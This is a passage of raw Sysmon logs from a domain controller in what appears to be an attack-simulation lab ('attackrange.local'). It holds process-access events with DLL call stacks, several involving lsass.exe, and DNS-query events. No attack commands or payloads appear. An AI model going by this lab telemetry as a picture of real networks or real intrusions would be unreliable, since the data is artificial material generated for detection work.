15:51:40.737{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.737{D28789B6-7C64-5FA1-1300-000000008801}12242004C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.722{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.722{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C80-5FA1-7200-000000008801}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C80-5FA1-7200-000000008801}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.675{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.331{D28789B6-7C62-5FA1-0B00-000000008801}8684756C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.253{D28789B6-7C62-5FA1-0B00-000000008801}8684756C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.253{D28789B6-7C62-5FA1-0B00-000000008801}8684756C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.003{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.982{D28789B6-7C64-5FA1-1000-000000008801}1144isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.944{D28789B6-7C64-5FA1-1000-000000008801}1144win-dc-807.attackrange.local0fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.944{D28789B6-7C64-5FA1-1500-000000008801}1336eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.944{D28789B6-7C64-5FA1-1500-000000008801}1336eqsetchpc1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.867{D28789B6-7C73-5FA1-3000-000000008801}2696win-dc-8070fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.838{D28789B6-7C64-5FA1-1500-000000008801}1336win-dc-807.attackrange.local0fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.837{D28789B6-7C73-5FA1-3700-000000008801}3084WIN-DC-8070fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt